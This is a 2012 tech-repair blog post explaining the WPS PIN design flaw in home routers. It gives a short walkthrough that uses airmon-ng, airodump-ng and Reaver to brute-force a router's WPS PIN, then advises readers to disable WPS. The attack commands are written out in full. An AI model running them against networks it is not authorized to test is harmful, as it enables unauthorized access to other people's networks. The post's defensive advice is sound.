Local Tech Repair: Cracking Almost Any Router

Tuesday, January 17, 2012

Cracking Almost Any Router

We all should already know that WEP is completely useless. Though we all think WPA is more secure (Which is true). Though like all things it is great to have a secure password with a secure protocal that should make it hard to break in. Though when you add simplicity to something and bad design you break the secure side.

Sense WPA cracking can take a long time even with GPU computer on your side. it still may take a day or more to crack probably closer to a month less you computer is set up for cracking. Recently there has been some news about a paper that Stefan Viehböck wrote. He goes though the design of WPS. Yes WPS not WPA. WPS is the flaw in the design of routers so that it makes it easier for computers to connect to them. He states a way of cracking into a router in 4 to 10 hours depending on the router.

So what is WPS? WPS is a protocal built into the router that is there for people that know nothing about computers to be able to look at the bottom of their router and then type in a 10 dig numerical code and the router then responds with the complex WPA key and they get connected. If you think about it that is an ok design the only problem is that the 10 digit key is not really 10 digits.

But I am getting side tracked what you really want to know is how to test this right ;-)

What you will need.

aircrack-ng installed
a wifi card that is able to go in monitor mode
and Reaver

so lets get to the steps

1. find card name mine is wlan0. so in terminal type

2. put card in monitor mode
sudo airmon-ng start wlan0
3. find router to attack
sudo airodump-ng mon0

4. attack selected ssid
sudo reaver -i mon0 -b 00:01:02:03:04:05

5. wait till it finishes.

Some neat things is that if you need to stop reaver during the cracking because you need to leave. you can always hit ctrl + C and the next time you start the program it will ask you if you want to continue where you left off. This is extremely helpful when some routers lock you out for periods of time. be it 5 mins or longer.

what is important about this is that we all need to learn to do something else to protect out wireless routers now.

when you login to your router and turn off WPS to prevent this attack from happening on your router in the future.
For my router which is a cheap Dynex router it is listed under Wi-Fi Protected Setup. This is where you disable the service.

Hope we all learned something here and I hope you have fun testing this out on your router.
Local tech Repair Admin

Please leave a comment and share this post with your friends.

Pictures of the process